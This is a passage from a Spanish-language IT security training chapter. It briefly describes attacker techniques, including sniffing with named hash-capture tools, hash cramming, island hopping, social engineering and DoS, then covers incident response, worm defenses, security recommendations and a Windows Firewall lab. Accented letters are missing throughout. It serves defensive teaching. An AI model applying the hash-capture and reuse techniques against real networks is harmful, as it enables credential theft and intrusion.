Despus de utilizar un sniffer el atacante est en condiciones de obtener


nombres de cuentas y passwords que pasen por la red en texto plano.
Puede ser utilizado para descubrir otras redes / equipos que pueden estar
comprometidos en un futuro.
Puede ser utilizado para descubrir otros sniffers.
Netmon utilizabroadcasts del protocolo BONE.
Los equipos Windows por defecto responden pedidos ARP (Unix puede
restringir respuestas ARP)
Ejemplos:
WinDump sniffer de lnea de comandos para Windows es similar a TCPDump
para Unix
Ethereal GUI OSS sniffer similar al network monitor
ScoopLM dedicado a NTLM hash sniffer
LC3 usado para captura de hash
Contramedidas:
Usar la ultima versin de NTLM V2 o Kerberos (recomendado) en todos los
equipos de la red.
Usar IPSec para encriptar el trafico de red.
Usar redes switcheadas para evitar la captura de paquetes.

10.2.12.

Tcnicas de Hacking: Island Hopping

Island Hopping es una tcnica de Hacking en la cual el hacker incorpora una red
de ordenadores dbiles y despus se traslada a partes ms seguras de la red.
Esencialmente, estn utilizando las mismas tcnicas discutidas previamente
para ampliar su influencia dentro de un ambiente dado de red. Una cosa es para
un atacante comprometer un web server sin inters y sin la seguridad apropiada.
Es algo mucho ms atractivo la red corporativa entera donde existen datos ms
interesantes para la compaa.
HASH CRAMMING
Permite al usuario conseguir el acceso al sistema sin romper la contrasea
insertando un Hash capturado directamente en la memoria. Esta tcnica puede
apresurar un ataque porque el atacante no necesita primero comprometer el
password de una cuenta.
10.2.13.

Tcnicas de Hacking: Social Engineering

Es de naturaleza humana. Nosotros, como generalizacin, conseguir la


satisfaccin de participar en el xito de otros. Los atacantes ruegan a menudo
esta opcin. No realizando prcticamente accin alguna, obtienen informacin
que de otra manera no estara disponible. Un atacante social listo puede
trampear a menudo a individuos en la organizacin para divulgar la informacin

que pertenece a los nombres de servers, nmeros de mdem, direcciones IP,


configuraciones de red, polticas de password, nombres de cuentas u otra
informacin privilegiada que sea beneficiosa en un ataque.
10.2.14.

Tcnicas de Hacking: Denial of Service

Un atacante no tiene que acceder necesariamente a un sistema para causar


problemas significativos. Los ataques Denial of Service (DoS) realizan tareas en
los servicios con el fin de evitar su normal funcionamiento. Los ejemplos
incluiran todas las conexiones de red en un server o asegurarse que un mail
Server reciba ms mails de los que puede manejar. Los ataques DoS pueden
ser un ataque directo o causado por virus, gusanos o Trojan horses.
Los objetivos de los ataques Denial of service pueden ser:

10.3.

CPU
Espacio en disco
Ancho de banda de red
Cualquier recurso o servicio

Lista de comprobacin de respuestas a incidentes

Cap1-26.jpg

10.4.

11.

Disponer de planes y procedimientos de respuesta a incidentes claros,


completos y bien comprobados es la clave para permitir una reaccin
rpida y controlada ante las amenazas.
Para limitar el efecto de un ataque, es importante que la respuesta sea
rpida y completa. Para que esto suceda, se debe realizar una
supervisin y auditora de los sistemas.
Una vez identificado un ataque, la respuesta al mismo depender del
tipo de ataque.
Comunicar que el ataque se ha producido a todo el personal
pertinente.
Contener los efectos del ataque en la medida de lo posible.
Tomar medidas preventivas para asegurar que el ataque no pueda
repetirse.
Crear documentacin para especificar la naturaleza del ataque, cmo
se identific y cmo se combati.
Contencin de los efectos de un ataque
Cuando un sistema sufre un ataque, se debe apagar y quitar de la red,
y se debe proteger el resto de los sistemas de la red.
Los servidores afectados se deben conservar y analizar, y es
necesario documentar las conclusiones.
Puede ser muy difcil cumplir las normas legales para la conservacin
de pruebas mientras se continan las actividades cotidianas. Con la
ayuda de asesores legales, se debe desarrollar un plan detallado que
permita conservar las pruebas del ataque y que cumpla los requisitos
legales de su jurisdiccin, de modo que pueda ponerse en prctica un
plan cuando la red sufra un ataque.

Ejemplos de ataques

En este tema, se describirn varios escenarios de ataque. Especficamente, se


tratarn los escenarios siguientes:

11.1.

Un gusano ataca el puerto UDP 135


Un gusano del correo electrnico
Un ataque infecta un equipo antes de aplicar revisiones o correcciones

Ataque de un gusano al puerto UDP 135

Permetro

El servidor de seguridad de red debe bloquearlo de acuerdo con su diseo

Red
Buscar y detectar los sistemas vulnerables
Desactivar las conexiones de red en los hosts vulnerables
Utilizar cuarentena de RRAS para asegurar que los hosts de acceso
telefnico tengan aplicadas las revisiones adecuadas

Host
Utilizar IPSec para permitir el uso del puerto UDP 135 entrante slo en los
hosts que requieran RPC
Utilizar Firewall de Windows para bloquear el trfico entrante que no se
desea que llegue a los hosts (en Windows XP y versiones posteriores). En
este ejemplo, se ha producido la proliferacin de una variedad del virus
Blaster. Se pueden tomar medidas en diversos niveles del modelo de
defensa en profundidad para impedir que un gusano ataque el puerto de
Protocolo de datagramas de usuario (UDP, User Datagram Protocol) 135.
11.2.

Gusano de correo electrnico

Permetro
Examinar todos los archivos adjuntos en la puerta de enlace SMTP
Red
Utilizar la cuarentena de RRAS para comprobar las revisiones aplicadas y las
firmas de virus
Aplicacin
Microsoft Office 98
Comprobar que est instalada la actualizacin de seguridad de Microsoft
Outlook 98.
Office 2000.
Comprobar que est instalado al menos el Service Pack 2
Office XP y Office 2003
La configuracin predeterminada de zona de seguridad es sitios restringidos
(en lugar de Internet) y las secuencias de comandos activas dentro de los
sitios restringidos, tambin estn deshabilitadas de forma predeterminada
Usuarios
Ensear a los usuarios que los archivos adjuntos pueden ser peligrosos.
Si se recibe un archivo adjunto que no se ha pedido, escribir a su autor para
comprobar el propsito antes de abrirlo

En los ltimos aos han aparecido muchos virus relacionados con el


correo electrnico. Se pueden tomar medidas en varios niveles del

modelo de defensa en profundidad para protegerse frente a los


gusanos de correo electrnico. Estas precauciones requieren
programas de aprendizaje especficos para que los usuarios conozcan
el riesgo y sigan los procedimientos apropiados.

11.3.
Han entrado en mi sistema antes de poder aplicar ninguna
revisin

Permetro
Habilitar o bloquear el servidor de seguridad

Red
Desconectar el cable de red

Host
Iniciar el sistema e inicie sesin
Se pueden necesitar credenciales administrativas locales si las almacenadas
en cach estn deshabilitadas
Active Firewall de Windows para bloquear todo el trfico entrante
Volver a conectar el cable de red
Descargar e instalar las revisiones apropiadas
Reiniciar el sistema
Desactivar Firewall de Windows segn la directiva

12.

Es posible que un ataque infecte un equipo antes de que se puedan


aplicar las revisiones o correcciones.
Para impedir que se produzcan daos en otros equipos de la red mientras
se lo repara, seguir estos pasos:
1. Desconectar el cable de red.
2. Iniciar el sistema e iniciar sesin. Se pueden necesitar credenciales
administrativas locales si las almacenadas en cach estn
deshabilitadas.
3. Activar Firewall de Windows para bloquear todo el trfico entrante.
4. Volver a conectar el cable de red.
5. Descargar e instale la revisin.
6. Reiniciar el sistema.
7. Desactive Firewall de Windows de acuerdo con la directiva.

Recomendaciones

En este tema, se enumerarn las recomendaciones para mejorar la seguridad.


Especficamente, se tratar:

Recomendaciones de seguridad.
Lista de comprobacin de la seguridad.

12.1.

Recomendaciones de seguridad

Defensa en profundidad
Seguro por diseo
Privilegios mnimos
Aprender de los errores cometidos
Mantener la seguridad
Hacer que los usuarios se centren en la concienciacin de seguridad
Desarrollar y probar planes y procedimientos de respuesta a
incidentes

Se deber seguir el modelo de defensa en profundidad. Cada nivel del


modelo est protegido por los niveles contiguos y depende de todos los
niveles que se implementan.
Hay un compromiso constante entre la funcionalidad y la seguridad.
Ambos raramente se complementan. Aunque quizs en alguna ocasin lo
importante haya sido la funcionalidad, ahora se busca definitivamente la
seguridad. As se facilita una implementacin segura por diseo. El
software y los sistemas son seguros de forma predeterminada y por
diseo, con lo que se simplifica la creacin de un entorno de red seguro.
Los procesos y las aplicaciones que se ejecutan en un sistema logran
este objetivo mediante un nivel definido de privilegios sobre el sistema. A
menos que se configuren de otro modo, los procesos iniciados, mientras
un usuario est conectado al sistema, se ejecutan con los mismos
privilegios que tiene el usuario. Para impedir ataques accidentales, todos
los usuarios del sistema deben iniciar sesin en l con los privilegios
mnimos necesarios para realizar sus funciones. Los virus se ejecutan con
los privilegios del usuario que haya iniciado la sesin. En consecuencia,
los virus tendrn un mbito mucho ms amplio si el usuario inicia sesin
como administrador.
Las aplicaciones y los servicios tambin se deben ejecutar con los
privilegios mnimos necesarios.
Es muy importante que se entienda que la seguridad no es un objetivo: es
un medio. Un entorno nunca es completamente seguro. Siguen
apareciendo nuevos virus, revisiones y puntos dbiles en los sistemas.
Aprenda de la experiencia y conserve una documentacin exhaustiva de
todo lo que suceda.
Para mantener la seguridad, implementar procedimientos de supervisin y
auditora, y comprobar que los resultados de estos procedimientos se
procesan con regularidad.
Disponer de planes y procedimientos de respuesta a incidentes claros,
completos y bien comprobados, es la clave para permitir una reaccin
rpida y controlada ante las amenazas.

12.2.

13.

Lista de comprobacin de seguridad

La seguridad comienza por el aprendizaje y la prctica. No se debe dejar


nada al azar ni permitir que los usuarios tomen sus propias decisiones
sobre este tema. Documentar todo lo que ocurra y crear procedimientos y
procesos para todas las funciones empresariales. Siempre que los
usuarios tengan que hacer algo, deben disponer de un documento que les
proporcione instrucciones paso a paso.
Tomar la delantera mantenindose informado de los problemas
relacionados con la seguridad. Microsoft enviar boletines de seguridad a
travs del correo electrnico a los suscriptores. Muchos ataques se
efectan aprovechando defectos de seguridad para los que existe alguna
revisin. Comprobar que se dispone de las herramientas de
administracin de revisiones ms actualizadas.
No olvidar realizar una defensa en profundidad. Implementar
procedimientos de seguridad en todos los niveles del modelo, ya que
unos dependen de otros. La seguridad de una red viene definida por su
punto ms dbil.
No dejar jams de recalcar la importancia de efectuar copias de seguridad
con regularidad. La prdida o la modificacin de los datos puede resultar
catastrfica para un negocio. Deben llevarse a cabo copias de seguridad
habitualmente. Almacenar siempre las copias de seguridad en un lugar
donde no estn los datos. Realizar tambin procedimientos de
restauracin peridicamente.
Averigar cmo podran atacar. Se deben conocer las herramientas de
ataque de un sistema y los virus. Investigar dnde se producen los
ataques y cmo. La encuesta sobre seguridad y delitos informticos de
CSI/FBI puede ser un buen lugar para comenzar.

Diez normas de seguridad inmutables

En este tema final, se enumerarn las diez normas inmutables de seguridad.

Cap1-27.jpg
1. Cuando se elige ejecutar un programa, se est tomando la decisin de
conceder el control del equipo. Una vez que se ejecuta un programa, se
puede realizar cualquier accin, hasta un lmite que viene determinado.
2. Al fin y al cabo, un sistema operativo slo es un conjunto de unos y ceros
que, al ser interpretados por el procesador, provocan que el equipo
realice determinadas acciones. Al cambiar los unos y ceros, har algo
diferente. Dnde se almacenan los unos y ceros? Pues en el equipo,
junto con todo lo dems. Son simplemente archivos y, si se permite
cambiarlos a los otros usuarios que utilizan el equipo, se "pierde la
partida".
3. Si alguien dispone de acceso fsico a un equipo, tiene control total sobre
l y puede realizar cualquier accin que desee, como modificar datos o
robarlos, llevarse el hardware o destruir fsicamente el equipo.
4. Si se administra un sitio Web, se tiene que limitar lo que pueden hacer en
l los visitantes. Slo se debe permitir que se ejecute un programa en el
sitio si lo escribe uno mismo o si se confa en quien lo ha desarrollado.
Pero posiblemente esto no sea suficiente. Si el sitio Web es uno de los
que se alojan en un servidor compartido, se deben tomar precauciones
adicionales. Alguien con no muy buenas intenciones puede comprometer
uno de los dems sitios del servidor y es posible que pueda extender su

control al propio servidor y, por lo tanto, controlar todos los sitios que
contenga, incluido el de uno.
5. Si un intruso puede averiguar su contrasea, podr iniciar sesin en el
equipo y realizar en l todas las acciones que puede hacer uno. Utilizar
siempre una contrasea; resulta increble el nmero de cuentas que
tienen contraseas en blanco. Y elegir una compleja. No utilizar el nombre
de un perro, fecha de aniversario ni el nombre de un equipo de ftbol
favorito. No emplear la palabra contrasea.
6. Un administrador poco confiable puede anular el resto de medidas de
seguridad que haya aplicado. Puede cambiar los permisos del equipo,
modificar las directivas de seguridad del sistema, instalar software
peligroso y suplantar a los usuarios, o realizar muchas otras acciones
diferentes. Puede sabotear prcticamente cualquier medida de proteccin
del sistema operativo, puesto que lo controla. Y lo que es peor, puede
borrar sus huellas. Si el administrador no es de confianza, el sistema no
tendr ninguna seguridad en absoluto.
7. Muchos sistemas operativos y productos de software de criptografa dan
la opcin de almacenar las claves criptogrficas en el equipo. La ventaja
es la comodidad: no hay que ocuparse de la clave; pero esto es a costa
de la seguridad. Las claves se suelen disimular (es decir, se ocultan) y
algunos de los mtodos para descubrirlas son bastante buenos. Pero, al
final, no importa lo bien oculta que est la clave: si se halla en el equipo,
es posible encontrarla. Tiene que ser posible encontrarla; despus de
todo, el software puede encontrarla, as que alguien suficientemente
motivado tambin podr. Siempre que sea posible, se deben guardar las
claves en otro lugar.
8. Los detectores de virus comparan los datos de un equipo con un conjunto
de firmas de virus. Cada firma es caracterstica de un virus en particular y,
cuando el detector encuentra en un archivo, en un mensaje de correo
electrnico o en algn otro lugar datos que coincidan con la firma,
determina que ha encontrado un virus. Sin embargo, un detector de virus
slo puede encontrar los virus que conoce. Es vital mantener el archivo
de firmas del detector de virus actualizado porque cada da se crean virus
nuevos.
9. La mejor forma de proteger la privacidad en Internet es igual que en la
vida normal: con forma de actuar. Leer las declaraciones de privacidad de
los sitios Web que se visitan y realizar transacciones slo con aquellos
con cuyas prcticas se est de acuerdo. Si preocupan los cookies,
deshabilitarlos. Especialmente, no explorar la Web de forma
indiscriminada: sabemos que la mayor parte de las ciudades tienen una
zona que es mejor evitar, e Internet es igual.
10. Una seguridad perfecta requiere un grado de perfeccin que simplemente
no existe en realidad y que no es probable que exista nunca. Esto es
cierto tanto en el software como en casi todos los campos de inters
humano. El desarrollo de software es una ciencia imperfecta y casi todo el
software tiene errores. Algunos de ellos se pueden aprovechar para

infringir la seguridad. Esto es la realidad. Pero aunque el software pudiera


ser perfecto, con ello no se solucionara todo el problema. La mayor parte
de los ataques implican, en cierto grado, alguna manipulacin de la
naturaleza humana, en lo que se suele denominar estratagemas sociales.
Si se aumenta el costo y la dificultad de atacar la tecnologa de seguridad,
quienes tengan malas intenciones respondern cambiando el modo de
actuar y pasarn a centrarse en la persona que se encuentra tras la
consola en lugar de en la tecnologa. Es vital conocer la funcin de
mantenimiento de una seguridad slida; en caso contrario slo uno podra
convertirse en el punto dbil del blindaje de los sistemas.
Para ver el artculo completo acerca de las diez normas inmutables de
seguridad, dirigirse a:
http://www.microsoft.com/technet/columns/security/essays/10imlaws.asp (este
sitio est en ingls)
Prctica 1: Habilitar Firewall de Windows y Configurar Firewall de Windows
para permitir el acceso al puerto 3389
Ejercicio 1: Crear una conexin a escritorio remoto
1. Inicie sesion en Windows XP Windows Server 2003
2. Desde start Run escriba mstsc.exe y presione enter.
3. En el campo Computer escriba el nombre o direccin IP de la
computadora remota.
4. Luego presione el botn Connect.
5. El sistema remoto le pedir credenciales.

Ejercicio 2: Cmo configurar Firewall de Windows para denegar la conexin.


Este ejercicio lo deber realizar en la computadora remota.
1.
2.
3.
4.
5.
6.
7.

Edite las propiedades de conexin del adaptador de red.


Seleccione el tab Advanced
Luego deje una marca en el cuadro Internet Connection Firewall
Edite la configuracin del Firewall desde el boton Settings
Verifique que no hay servicios habilitados.
Presione dos veces en la opcin OK
Verifique la conexin al escritorio remoto desde la otra computadora.

Ejercicio 3: Cmo configurar Firewall de Windows para permitir el uso del puerto
3389

Este ejercicio lo deber realizar en la computadora remota.


1.
2.
3.
4.
5.

14.

Edite la configuracin de Firewall presionando el botn Settings


Haga una marca en el cuadro Remote Desktop.
Presione dos veces en OK
Verifique la conexin al escritorio remoto desde otra computadora.
Verifique la conexin a otros servicios.

Resumen del capitulo

Caso prctico
Disciplina de administracin de riesgos de seguridad
Defensa en profundidad
Respuesta a incidentes de seguridad
Ejemplos de ataques
Recomendaciones
Diez normas de seguridad inmutables

Este capitulo ha sido una introduccin a los fundamentos de la implementacin


de un entorno de equipo seguro. ste es un tema muy extenso y complejo que
requiere una atencin continuada y una mejora constante de los conocimientos,
procesos y procedimientos.

15.

Pasos siguientes
Obtener aprendizaje de seguridad adicional
Buscar seminarios de aprendizaje en lnea:
http://www.microsoft.com/seminar/events/security.mspx (este sitio est en
ingls)
Buscar un CTEC local que ofrezca cursos prcticos:
http://www.microsoft.com/mspress/latam/default.htm
Implementar una solucin de administracin de revisiones
Buscar informacin de orientacin y herramientas:
http://www.microsoft.com/technet/security/topics/patch/default.mspx (este
sitio est en ingls)
Mantenerse informado sobre la seguridad:
Suscribirse a boletines de seguridad:
http://www.microsoft.com/security/security_bulletins/alerts2.asp (este sitio
est en ingls)
Obtener las directrices de seguridad de Microsoft ms recientes:
http://www.microsoft.com/technet/security/bestprac/ (este sitio est en
ingls)

Los pasos siguientes incluyen ir al sitio Web de Microsoft para:

16.

Obtener aprendizaje de seguridad adicional.


Buscar orientacin sobre la implementacin de una solucin de
administracin de revisiones.
Obtener la informacin sobre seguridad ms reciente.

Para obtener ms informacin

Hay ms informacin tcnica para profesionales de IT y desarrolladores en los


sitios Web siguientes:

Sitio de seguridad de Microsoft (todos los usuarios):


http://www.microsoft.com/latam/seguridad
Sitio de seguridad de TechNet (profesionales de IT):
http://www.microsoft.com/latam/technet/seguridad/default.asp
Sitio de seguridad de MSDN (desarrolladores).
http://msdn.microsoft.com/security (este sitio est en ingls)